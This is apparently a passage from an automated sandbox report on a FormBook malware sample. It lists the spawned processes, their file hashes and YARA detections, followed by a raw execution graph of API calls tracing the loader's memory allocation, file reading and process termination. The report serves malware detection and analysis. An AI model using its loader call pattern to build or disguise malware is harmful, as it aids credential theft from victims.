                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:22:50:17
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe"
                                                        Imagebase:0xd00000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:22:50:19
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                        Imagebase:0x10000
                                                        File size:19'456 bytes
                                                        MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:22:50:32
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe"
                                                        Imagebase:0xd00000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:22:50:44
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff6bf500000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.6%
                                                          Dynamic/Decrypted Code Coverage:1.3%
                                                          Signature Coverage:9.7%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:34
                                                          execution_graph 103282 c61066 103287 c6f76f 103282->103287 103284 c6106c 103320 c82d40 103284->103320 103288 c6f790 103287->103288 103323 c7ff03 103288->103323 103292 c6f7d7 103333 c67667 103292->103333 103295 c67667 59 API calls 103296 c6f7eb 103295->103296 103297 c67667 59 API calls 103296->103297 103298 c6f7f5 103297->103298 103299 c67667 59 API calls 103298->103299 103300 c6f833 103299->103300 103301 c67667 59 API calls 103300->103301 103302 c6f8fe 103301->103302 103338 c75f87 103302->103338 103306 c6f930 103307 c67667 59 API calls 103306->103307 103308 c6f93a 103307->103308 103366 c7fd9e 103308->103366 103310 c6f981 103311 c6f991 GetStdHandle 103310->103311 103312 ca45ab 103311->103312 103313 c6f9dd 103311->103313 103312->103313 103315 ca45b4 103312->103315 103314 c6f9e5 OleInitialize 103313->103314 103314->103284 103373 cc6b38 64 API calls Mailbox 103315->103373 103317 ca45bb 103374 cc7207 CreateThread 103317->103374 103319 ca45c7 CloseHandle 103319->103314 103446 c82c44 103320->103446 103322 c61076 103375 c7ffdc 103323->103375 103326 c7ffdc 59 API calls 103327 c7ff45 103326->103327 103328 c67667 59 API calls 103327->103328 103329 c7ff51 103328->103329 103382 c67bcc 103329->103382 103331 c6f796 103332 c80162 6 API calls 103331->103332 103332->103292 103334 c80db6 Mailbox 59 API calls 103333->103334 103335 c67688 103334->103335 103336 c80db6 Mailbox 59 API calls 103335->103336 103337 c67696 103336->103337 103337->103295 103339 c67667 59 API calls 103338->103339 103340 c75f97 103339->103340 103341 c67667 59 API calls 103340->103341 103342 c75f9f 103341->103342 103441 c75a9d 103342->103441 103345 c75a9d 59 API calls 103346 c75faf 103345->103346 103347 c67667 59 API calls 103346->103347 103348 c75fba 103347->103348 103349 c80db6 Mailbox 59 API calls 103348->103349 103350 c6f908 103349->103350 103351 c760f9 103350->103351 103352 c76107 103351->103352 103353 c67667 59 API calls 103352->103353 103354 c76112 103353->103354 103355 c67667 59 API calls 103354->103355 103356 c7611d 103355->103356 103357 c67667 59 API calls 103356->103357 103358 c76128 103357->103358 103359 c67667 59 API calls 103358->103359 103360 c76133 103359->103360 103361 c75a9d 59 API calls 103360->103361 103362 c7613e 103361->103362 103363 c80db6 Mailbox 59 API calls 103362->103363 103364 c76145 RegisterWindowMessageW 103363->103364 103364->103306 103367 cb576f 103366->103367 103368 c7fdae 103366->103368 103444 cc9ae7 60 API calls 103367->103444 103370 c80db6 Mailbox 59 API calls 103368->103370 103372 c7fdb6 103370->103372 103371 cb577a 103372->103310 103373->103317 103374->103319 103445 cc71ed 65 API calls 103374->103445 103376 c67667 59 API calls 103375->103376 103377 c7ffe7 103376->103377 103378 c67667 59 API calls 103377->103378 103379 c7ffef 103378->103379 103380 c67667 59 API calls 103379->103380 103381 c7ff3b 103380->103381 103381->103326 103383 c67c45 103382->103383 103384 c67bd8 __NMSG_WRITE 103382->103384 103395 c67d2c 103383->103395 103386 c67c13 103384->103386 103387 c67bee 103384->103387 103392 c68029 103386->103392 103391 c67f27 59 API calls Mailbox 103387->103391 103390 c67bf6 _memmove 103390->103331 103391->103390 103399 c80db6 103392->103399 103394 c68033 103394->103390 103396 c67d43 _memmove 103395->103396 103397 c67d3a 103395->103397 103396->103390 103397->103396 103437 c67e4f 103397->103437 103402 c80dbe 103399->103402 103401 c80dd8 103401->103394 103402->103401 103404 c80ddc std::exception::exception 103402->103404 103409 c8571c 103402->103409 103426 c833a1 DecodePointer 103402->103426 103427 c8859b RaiseException 103404->103427 103406 c80e06 103428 c884d1 58 API calls _free 103406->103428 103408 c80e18 103408->103394 103410 c85797 103409->103410 103414 c85728 103409->103414 103435 c833a1 DecodePointer 103410->103435 103412 c8579d 103436 c88b28 58 API calls __getptd_noexit 103412->103436 103413 c85733 103413->103414 103429 c8a16b 58 API calls __NMSG_WRITE 103413->103429 103430 c8a1c8 58 API calls 5 library calls 103413->103430 103431 c8309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103413->103431 103414->103413 103417 c8575b RtlAllocateHeap 103414->103417 103420 c85783 103414->103420 103424 c85781 103414->103424 103432 c833a1 DecodePointer 103414->103432 103417->103414 103418 c8578f 103417->103418 103418->103402 103433 c88b28 58 API calls __getptd_noexit 103420->103433 103434 c88b28 58 API calls __getptd_noexit 103424->103434 103426->103402 103427->103406 103428->103408 103429->103413 103430->103413 103432->103414 103433->103424 103434->103418 103435->103412 103436->103418 103438 c67e62 103437->103438 103440 c67e5f _memmove 103437->103440 103439 c80db6 Mailbox 59 API calls 103438->103439 103439->103440 103440->103396 103442 c67667 59 API calls 103441->103442 103443 c75aa5 103442->103443 103443->103345 103444->103371 103447 c82c50 __freefls@4 103446->103447 103454 c83217 103447->103454 103453 c82c77 __freefls@4 103453->103322 103471 c89c0b 103454->103471 103456 c82c59 103457 c82c88 DecodePointer DecodePointer 103456->103457 103458 c82cb5 103457->103458 103459 c82c65 103457->103459 103458->103459 103517 c887a4 59 API calls __beginthread 103458->103517 103468 c82c82 103459->103468 103461 c82d18 EncodePointer EncodePointer 103461->103459 103462 c82cec 103462->103459 103466 c82d06 EncodePointer 103462->103466 103519 c88864 61 API calls 2 library calls 103462->103519 103463 c82cc7 103463->103461 103463->103462 103518 c88864 61 API calls 2 library calls 103463->103518 103466->103461 103467 c82d00 103467->103459 103467->103466 103520 c83220 103468->103520 103472 c89c1c 103471->103472 103473 c89c2f EnterCriticalSection 103471->103473 103478 c89c93 103472->103478 103473->103456 103475 c89c22 103475->103473 103502 c830b5 58 API calls 3 library calls 103475->103502 103479 c89c9f __freefls@4 103478->103479 103480 c89ca8 103479->103480 103481 c89cc0 103479->103481 103503 c8a16b 58 API calls __NMSG_WRITE 103480->103503 103489 c89ce1 __freefls@4 103481->103489 103506 c8881d 58 API calls 2 library calls 103481->103506 103483 c89cad 103504 c8a1c8 58 API calls 5 library calls 103483->103504 103485 c89cd5 103487 c89ceb 103485->103487 103488 c89cdc 103485->103488 103492 c89c0b __lock 58 API calls 103487->103492 103507 c88b28 58 API calls __getptd_noexit 103488->103507 103489->103475 103490 c89cb4 103505 c8309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103490->103505 103494 c89cf2 103492->103494 103496 c89cff 103494->103496 103497 c89d17 103494->103497 103508 c89e2b InitializeCriticalSectionAndSpinCount 103496->103508 103509 c82d55 103497->103509 103500 c89d0b 103515 c89d33 LeaveCriticalSection _doexit 103500->103515 103503->103483 103504->103490 103506->103485 103507->103489 103508->103500 103510 c82d5e RtlFreeHeap 103509->103510 103514 c82d87 _free 103509->103514 103511 c82d73 103510->103511 103510->103514 103516 c88b28 58 API calls __getptd_noexit 103511->103516 103513 c82d79 GetLastError 103513->103514 103514->103500 103515->103489 103516->103513 103517->103463 103518->103462 103519->103467 103523 c89d75 LeaveCriticalSection 103520->103523 103522 c82c87 103522->103453 103523->103522 103524 c61016 103529 c64974 103524->103529 103527 c82d40 __cinit 67 API calls 103528 c61025 103527->103528 103530 c80db6 Mailbox 59 API calls 103529->103530 103531 c6497c 103530->103531 103532 c6101b 103531->103532 103536 c64936 103531->103536 103532->103527 103537 c64951 103536->103537 103538 c6493f 103536->103538 103540 c649a0 103537->103540 103539 c82d40 __cinit 67 API calls 103538->103539 103539->103537 103541 c67667 59 API calls 103540->103541 103542 c649b8 GetVersionExW 103541->103542 103543 c67bcc 59 API calls 103542->103543 103544 c649fb 103543->103544 103545 c67d2c 59 API calls 103544->103545 103554 c64a28 103544->103554 103546 c64a1c 103545->103546 103568 c67726 103546->103568 103548 c64a93 GetCurrentProcess IsWow64Process 103549 c64aac 103548->103549 103551 c64ac2 103549->103551 103552 c64b2b GetSystemInfo 103549->103552 103550 c9d864 103564 c64b37 103551->103564 103553 c64af8 103552->103553 103553->103532 103554->103548 103554->103550 103557 c64ad4 103560 c64b37 2 API calls 103557->103560 103558 c64b1f GetSystemInfo 103559 c64ae9 103558->103559 103559->103553 103562 c64aef FreeLibrary 103559->103562 103561 c64adc GetNativeSystemInfo 103560->103561 103561->103559 103562->103553 103565 c64ad0 103564->103565 103566 c64b40 LoadLibraryA 103564->103566 103565->103557 103565->103558 103566->103565 103567 c64b51 GetProcAddress 103566->103567 103567->103565 103569 c67734 103568->103569 103570 c67d2c 59 API calls 103569->103570 103571 c67744 103570->103571 103571->103554 103572 10155c0 103586 1013210 103572->103586 103574 1015665 103589 10154b0 103574->103589 103592 1016690 GetPEB 103586->103592 103588 101389b 103588->103574 103590 10154b9 Sleep 103589->103590 103591 10154c7 103590->103591 103593 10166ba 103592->103593 103593->103588 103594 cc8d0d 103595 cc8d1a 103594->103595 103596 cc8d20 103594->103596 103597 c82d55 _free 58 API calls 103595->103597 103598 c82d55 _free 58 API calls 103596->103598 103599 cc8d31 103596->103599 103597->103596 103598->103599 103600 cc8d43 103599->103600 103601 c82d55 _free 58 API calls 103599->103601 103601->103600 103602 c61055 103607 c62649 103602->103607 103605 c82d40 __cinit 67 API calls 103606 c61064 103605->103606 103608 c67667 59 API calls 103607->103608 103609 c626b7 103608->103609 103614 c63582 103609->103614 103612 c62754 103613 c6105a 103612->103613 103617 c63416 59 API calls 2 library calls 103612->103617 103613->103605 103618 c635b0 103614->103618 103617->103612 103619 c635a1 103618->103619 103620 c635bd 103618->103620 103619->103612 103620->103619 103621 c635c4 RegOpenKeyExW 103620->103621 103621->103619 103622 c635de RegQueryValueExW 103621->103622 103623 c63614 RegCloseKey 103622->103623 103624 c635ff 103622->103624 103623->103619 103624->103623 103625 c63633 103626 c6366a 103625->103626 103627 c636e7 103626->103627 103628 c63688 103626->103628 103666 c636e5 103626->103666 103630 c9d0cc 103627->103630 103631 c636ed 103627->103631 103632 c63695 103628->103632 103633 c6374b PostQuitMessage 103628->103633 103629 c636ca DefWindowProcW 103656 c636d8 103629->103656 103680 c71070 10 API calls Mailbox 103630->103680 103634 c63715 SetTimer RegisterWindowMessageW 103631->103634 103635 c636f2 103631->103635 103637 c636a0 103632->103637 103638 c9d154 103632->103638 103633->103656 103642 c6373e CreatePopupMenu 103634->103642 103634->103656 103639 c9d06f 103635->103639 103640 c636f9 KillTimer 103635->103640 103643 c63755 103637->103643 103644 c636a8 103637->103644 103696 cc2527 71 API calls _memset 103638->103696 103648 c9d0a8 MoveWindow 103639->103648 103649 c9d074 103639->103649 103677 c6443a Shell_NotifyIconW _memset 103640->103677 103641 c9d0f3 103681 c71093 341 API calls Mailbox 103641->103681 103642->103656 103670 c644a0 103643->103670 103652 c9d139 103644->103652 103653 c636b3 103644->103653 103646 c9d166 103646->103629 103646->103656 103648->103656 103657 c9d078 103649->103657 103658 c9d097 SetFocus 103649->103658 103652->103629 103695 cb7c36 59 API calls Mailbox 103652->103695 103654 c636be 103653->103654 103655 c9d124 103653->103655 103654->103629 103682 c6443a Shell_NotifyIconW _memset 103654->103682 103694 cc2d36 81 API calls _memset 103655->103694 103657->103654 103660 c9d081 103657->103660 103658->103656 103659 c6370c 103678 c63114 DeleteObject DestroyWindow Mailbox 103659->103678 103679 c71070 10 API calls Mailbox 103660->103679 103665 c9d134 103665->103656 103666->103629 103668 c9d118 103683 c6434a 103668->103683 103671 c644b7 _memset 103670->103671 103672 c64539 103670->103672 103697 c6407c 103671->103697 103672->103656 103674 c64522 KillTimer SetTimer 103674->103672 103675 c644de 103675->103674 103676 c9d4ab Shell_NotifyIconW 103675->103676 103676->103674 103677->103659 103678->103656 103679->103656 103680->103641 103681->103654 103682->103668 103684 c64375 _memset 103683->103684 103757 c64182 103684->103757 103687 c643fa 103689 c64414 Shell_NotifyIconW 103687->103689 103690 c64430 Shell_NotifyIconW 103687->103690 103691 c64422 103689->103691 103690->103691 103692 c6407c 61 API calls 103691->103692 103693 c64429 103692->103693 103693->103666 103694->103665 103695->103666 103696->103646 103698 c64098 103697->103698 103718 c6416f Mailbox 103697->103718 103719 c67a16 103698->103719 103701 c9d3c8 LoadStringW 103705 c9d3e2 103701->103705 103702 c640b3 103703 c67bcc 59 API calls 103702->103703 103704 c640c8 103703->103704 103704->103705 103706 c640d9 103704->103706 103707 c67b2e 59 API calls 103705->103707 103708 c64174 103706->103708 103709 c640e3 103706->103709 103712 c9d3ec 103707->103712 103733 c68047 103708->103733 103724 c67b2e 103709->103724 103714 c640ed _memset _wcscpy 103712->103714 103737 c67cab 103712->103737 103716 c64155 Shell_NotifyIconW 103714->103716 103715 c9d40e 103717 c67cab 59 API calls 103715->103717 103716->103718 103717->103714 103718->103675 103720 c80db6 Mailbox 59 API calls 103719->103720 103721 c67a3b 103720->103721 103722 c68029 59 API calls 103721->103722 103723 c640a6 103722->103723 103723->103701 103723->103702 103725 c9ec6b 103724->103725 103726 c67b40 103724->103726 103750 cb7bdb 59 API calls _memmove 103725->103750 103744 c67a51 103726->103744 103729 c67b4c 103729->103714 103730 c9ec75 103731 c68047 59 API calls 103730->103731 103732 c9ec7d Mailbox 103731->103732 103734 c68052 103733->103734 103735 c6805a 103733->103735 103751 c67f77 59 API calls 2 library calls 103734->103751 103735->103714 103738 c9ed4a 103737->103738 103739 c67cbf 103737->103739 103741 c68029 59 API calls 103738->103741 103752 c67c50 103739->103752 103743 c9ed55 __NMSG_WRITE _memmove 103741->103743 103742 c67cca 103742->103715 103745 c67a85 _memmove 103744->103745 103746 c67a5f 103744->103746 103745->103729 103745->103745 103746->103745 103747 c80db6 Mailbox 59 API calls 103746->103747 103748 c67ad4 103747->103748 103749 c80db6 Mailbox 59 API calls 103748->103749 103749->103745 103750->103730 103751->103735 103753 c67c5f __NMSG_WRITE 103752->103753 103754 c68029 59 API calls 103753->103754 103755 c67c70 _memmove 103753->103755 103756 c9ed07 _memmove 103754->103756 103755->103742 103758 c64196 103757->103758 103759 c9d423 103757->103759 103758->103687 103761 cc2f94 62 API calls _W_store_winword 103758->103761 103759->103758 103760 c9d42c DestroyIcon 103759->103760 103760->103758 103761->103687 103762 c9fdfc 103767 c6ab30 Mailbox _memmove 103762->103767 103766 c80db6 59 API calls Mailbox 103766->103767 103767->103766 103768 c6b525 103767->103768 103788 c6a057 103767->103788 103790 c69f37 Mailbox 103767->103790 103796 c6b2b6 103767->103796 103799 ca086a 103767->103799 103801 ca0878 103767->103801 103803 ca085c 103767->103803 103804 c6b21c 103767->103804 103808 cb6e8f 59 API calls 103767->103808 103810 cddf23 103767->103810 103815 c69ea0 103767->103815 103839 c69c90 103767->103839 103858 cdc193 85 API calls 2 library calls 103767->103858 103859 cdc2e0 96 API calls Mailbox 103767->103859 103860 cc7956 59 API calls Mailbox 103767->103860 103861 c67de1 103767->103861 103865 cdbc6b 341 API calls Mailbox 103767->103865 103866 cb617e 59 API calls Mailbox 103767->103866 103868 cc9e4a 89 API calls 4 library calls 103768->103868 103771 ca0055 103867 cc9e4a 89 API calls 4 library calls 103771->103867 103775 c6b475 103779 c68047 59 API calls 103775->103779 103776 c80db6 59 API calls Mailbox 103776->103790 103777 ca0064 103779->103788 103781 c68047 59 API calls 103781->103790 103783 c67667 59 API calls 103783->103790 103784 c6b47a 103784->103771 103792 ca09e5 103784->103792 103785 cb6e8f 59 API calls 103785->103790 103786 c82d40 67 API calls __cinit 103786->103790 103789 ca09d6 103872 cc9e4a 89 API calls 4 library calls 103789->103872 103790->103771 103790->103775 103790->103776 103790->103781 103790->103783 103790->103784 103790->103785 103790->103786 103790->103788 103790->103789 103794 c6a55a 103790->103794 103813 c6c8c0 341 API calls 2 library calls 103790->103813 103814 c6b900 60 API calls Mailbox 103790->103814 103873 cc9e4a 89 API calls 4 library calls 103792->103873 103871 cc9e4a 89 API calls 4 library calls 103794->103871 103857 c6f6a3 341 API calls 103796->103857 103800 c69c90 Mailbox 59 API calls 103799->103800 103800->103803 103870 cc9e4a 89 API calls 4 library calls 103801->103870 103803->103788 103869 cb617e 59 API calls Mailbox 103803->103869 103844 c69d3c 103804->103844 103806 c6b22d 103807 c69d3c 60 API calls 103806->103807 103807->103796 103808->103767 103874 cdcadd 103810->103874 103812 cddf33 103812->103767 103813->103790 103814->103790 103816 c69ebf 103815->103816 103826 c69eed Mailbox 103815->103826 103817 c80db6 Mailbox 59 API calls 103816->103817 103817->103826 103818 c82d40 67 API calls __cinit 103818->103826 103819 c6b475 103820 c68047 59 API calls 103819->103820 103830 c6a057 103820->103830 103821 c6b47a 103822 ca09e5 103821->103822 103823 ca0055 103821->103823 104022 cc9e4a 89 API calls 4 library calls 103822->104022 104019 cc9e4a 89 API calls 4 library calls 103823->104019 103825 c80db6 59 API calls Mailbox 103825->103826 103826->103818 103826->103819 103826->103821 103826->103823 103826->103825 103826->103830 103832 c68047 59 API calls 103826->103832 103834 c67667 59 API calls 103826->103834 103835 cb6e8f 59 API calls 103826->103835 103836 ca09d6 103826->103836 103838 c6a55a 103826->103838 104017 c6c8c0 341 API calls 2 library calls 103826->104017 104018 c6b900 60 API calls Mailbox 103826->104018 103829 ca0064 103829->103767 103830->103767 103832->103826 103834->103826 103835->103826 104021 cc9e4a 89 API calls 4 library calls 103836->104021 104020 cc9e4a 89 API calls 4 library calls 103838->104020 103841 c69c9b 103839->103841 103840 c69cd2 103840->103767 103841->103840 104023 c68cd4 59 API calls Mailbox 103841->104023 103843 c69cfd 103843->103767 103845 c69d4a 103844->103845 103855 c69d78 Mailbox 103844->103855 103846 c69d9d 103845->103846 103849 c69d50 Mailbox 103845->103849 103848 c68047 59 API calls 103846->103848 103847 c69d64 103850 c69dcc 103847->103850 103851 c69d6f 103847->103851 103847->103855 103848->103855 103849->103847 103852 c9fa0f 103849->103852 103850->103855 104024 c68cd4 59 API calls Mailbox 103850->104024 103854 c9f9e6 VariantClear 103851->103854 103851->103855 103852->103855 104025 cb6e8f 59 API calls 103852->104025 103854->103855 103855->103806 103857->103768 103858->103767 103859->103767 103860->103767 103862 c67df0 __NMSG_WRITE _memmove 103861->103862 103863 c80db6 Mailbox 59 API calls 103862->103863 103864 c67e2e 103863->103864 103864->103767 103865->103767 103866->103767 103867->103777 103868->103803 103869->103788 103870->103803 103871->103788 103872->103792 103873->103788 103912 c69837 103874->103912 103878 cdcdb9 103879 cdcf2e 103878->103879 103883 cdcdc7 103878->103883 103979 cdd8c8 92 API calls Mailbox 103879->103979 103882 cdcf3d 103882->103883 103885 cdcf49 103882->103885 103943 cdc96e 103883->103943 103884 c69837 84 API calls 103896 cdcbb2 Mailbox 103884->103896 103895 cdcb61 Mailbox 103885->103895 103890 cdce00 103958 c80c08 103890->103958 103893 cdce1a 103964 cc9e4a 89 API calls 4 library calls 103893->103964 103894 cdce33 103965 c692ce 103894->103965 103895->103812 103896->103878 103896->103884 103896->103895 103962 cdfbce 59 API calls 2 library calls 103896->103962 103963 cdcfdf 61 API calls 2 library calls 103896->103963 103899 cdce25 GetCurrentProcess TerminateProcess 103899->103894 103904 cdcfa4 103904->103895 103908 cdcfb8 FreeLibrary 103904->103908 103905 cdce6b 103977 cdd649 107 API calls _free 103905->103977 103908->103895 103910 c69d3c 60 API calls 103911 cdce7c 103910->103911 103911->103904 103911->103910 103978 c68d40 59 API calls Mailbox 103911->103978 103980 cdd649 107 API calls _free 103911->103980 103913 c69851 103912->103913 103922 c6984b 103912->103922 103914 c69857 __itow 103913->103914 103915 c69899 103913->103915 103917 c9f4da 103913->103917 103920 c9f5d3 __i64tow 103913->103920 103919 c80db6 Mailbox 59 API calls 103914->103919 103981 c83698 83 API calls 3 library calls 103915->103981 103923 c80db6 Mailbox 59 API calls 103917->103923 103929 c9f552 Mailbox _wcscpy 103917->103929 103921 c69871 103919->103921 103921->103922 103924 c67de1 59 API calls 103921->103924 103922->103895 103930 cdd7a5 103922->103930 103925 c9f51f 103923->103925 103924->103922 103926 c80db6 Mailbox 59 API calls 103925->103926 103927 c9f545 103926->103927 103928 c67de1 59 API calls 103927->103928 103927->103929 103928->103929 103982 c83698 83 API calls 3 library calls 103929->103982 103931 c67e4f 59 API calls 103930->103931 103932 cdd7c0 CharLowerBuffW 103931->103932 103983 cbf167 103932->103983 103936 c67667 59 API calls 103937 cdd7f9 103936->103937 103990 c6784b 103937->103990 103939 cdd810 103940 c67d2c 59 API calls 103939->103940 103941 cdd81c Mailbox 103940->103941 103942 cdd858 Mailbox 103941->103942 104003 cdcfdf 61 API calls 2 library calls 103941->104003 103942->103896 103944 cdc9de 103943->103944 103945 cdc989 103943->103945 103949 cdda50 103944->103949 103946 c80db6 Mailbox 59 API calls 103945->103946 103948 cdc9ab 103946->103948 103947 c80db6 Mailbox 59 API calls 103947->103948 103948->103944 103948->103947 103950 cddc79 Mailbox 103949->103950 103957 cdda73 _strcat _wcscpy __NMSG_WRITE 103949->103957 103950->103890 103951 c69b98 59 API calls 103951->103957 103952 c69be6 59 API calls 103952->103957 103953 c69b3c 59 API calls 103953->103957 103954 c69837 84 API calls 103954->103957 103955 c8571c 58 API calls __crtGetStringTypeA_stat 103955->103957 103957->103950 103957->103951 103957->103952 103957->103953 103957->103954 103957->103955 104007 cc5887 61 API calls 2 library calls 103957->104007 103960 c80c1d 103958->103960 103959 c80cb5 VirtualProtect 103961 c80c83 103959->103961 103960->103959 103960->103961 103961->103893 103961->103894 103962->103896 103963->103896 103964->103899 103966 c692d6 103965->103966 103967 c80db6 Mailbox 59 API calls 103966->103967 103969 c692e4 103967->103969 103968 c692f0 103971 c69050 103968->103971 103969->103968 104008 c691fc 59 API calls Mailbox 103969->104008 104009 c69160 103971->104009 103973 c6905f 103974 c80db6 Mailbox 59 API calls 103973->103974 103975 c690fb 103973->103975 103974->103975 103975->103911 103976 c68d40 59 API calls Mailbox 103975->103976 103976->103905 103977->103911 103978->103911 103979->103882 103980->103911 103981->103914 103982->103920 103984 cbf192 __NMSG_WRITE 103983->103984 103985 cbf1d1 103984->103985 103988 cbf1c7 103984->103988 103989 cbf278 103984->103989 103985->103936 103985->103941 103988->103985 104004 c678c4 61 API calls 103988->104004 103989->103985 104005 c678c4 61 API calls 103989->104005 103991 c678b7 103990->103991 103992 c6785a 103990->103992 103994 c67d2c 59 API calls 103991->103994 103992->103991 103993 c67865 103992->103993 103995 c9eb09 103993->103995 103996 c67880 103993->103996 104000 c67888 _memmove 103994->104000 103997 c68029 59 API calls 103995->103997 104006 c67f27 59 API calls Mailbox 103996->104006 103999 c9eb13 103997->103999 104001 c80db6 Mailbox 59 API calls 103999->104001 104000->103939 104002 c9eb33 104001->104002 104003->103942 104004->103988 104005->103989 104006->104000 104007->103957 104008->103968 104010 c69169 Mailbox 104009->104010 104011 c9f19f 104010->104011 104016 c69173 104010->104016 104012 c80db6 Mailbox 59 API calls 104011->104012 104014 c9f1ab 104012->104014 104013 c6917a 104013->103973 104015 c69c90 Mailbox 59 API calls 104015->104016 104016->104013 104016->104015 104017->103826 104018->103826 104019->103829 104020->103830 104021->103822 104022->103830 104023->103843 104024->103855 104025->103855 104026 ca416f 104030 cb5fe6 104026->104030 104028 ca417a 104029 cb5fe6 85 API calls 104028->104029 104029->104028 104036 cb5ff3 104030->104036 104037 cb6020 104030->104037 104031 cb6022 104042 c69328 84 API calls Mailbox 104031->104042 104033 cb6027 104034 c69837 84 API calls 104033->104034 104035 cb602e 104034->104035 104038 c67b2e 59 API calls 104035->104038 104036->104031 104036->104033 104036->104037 104039 cb601a 104036->104039 104037->104028 104038->104037 104041 c695a0 59 API calls _wcsstr 104039->104041 104041->104037 104042->104033 104043 1015b6b 104046 10157e0 104043->104046 104045 1015bb7 104047 1013210 GetPEB 104046->104047 104048 101587f 104047->104048 104051 10158d9 VirtualAlloc 104048->104051 104054 10158bd 104048->104054 104057 10159e0 CloseHandle 104048->104057 104058 10159f0 VirtualFree 104048->104058 104059 10166f0 GetPEB 104048->104059 104050 10158b0 CreateFileW 104050->104048 104050->104054 104052 10158fa ReadFile 104051->104052 104051->104054 104053 1015918 VirtualAlloc 104052->104053 104052->104054 104053->104048 104053->104054 104055 1015ada 104054->104055 104056 1015acc VirtualFree 104054->104056 104055->104045 104056->104055 104057->104048 104058->104048 104060 101671a 104059->104060 104060->104050 104061 c6107d 104066 c6708b 104061->104066 104063 c6108c 104064 c82d40 __cinit 67 API calls 104063->104064 104065 c61096 104064->104065 104067 c6709b __ftell_nolock 104066->104067 104068 c67667 59 API calls 104067->104068 104069 c67151 104068->104069 104097 c64706 104069->104097 104071 c6715a 104104 c8050b 104071->104104 104074 c67cab 59 API calls 104075 c67173 104074->104075 104110 c63f74 104075->104110 104078 c67667 59 API calls 104079 c6718b 104078->104079 104116 c67d8c 104079->104116 104081 c67194 RegOpenKeyExW 104082 c9e8b1 RegQueryValueExW 104081->104082 104086 c671b6 Mailbox 104081->104086 104083 c9e8ce 104082->104083 104084 c9e943 RegCloseKey 104082->104084 104085 c80db6 Mailbox 59 API calls 104083->104085 104084->104086 104093 c9e955 _wcscat Mailbox __NMSG_WRITE 104084->104093 104087 c9e8e7 104085->104087 104086->104063 104120 c6522e 104087->104120 104090 c9e90f 104091 c67bcc 59 API calls 104090->104091 104092 c9e929 104091->104092 104092->104084 104093->104086 104094 c67de1 59 API calls 104093->104094 104095 c63f74 59 API calls 104093->104095 104096 c679f2 59 API calls 104093->104096 104094->104093 104095->104093 104096->104093 104123 c91940 104097->104123 104100 c67de1 59 API calls 104101 c64739 104100->104101 104125 c64750 104101->104125 104103 c64743 Mailbox 104103->104071 104105 c91940 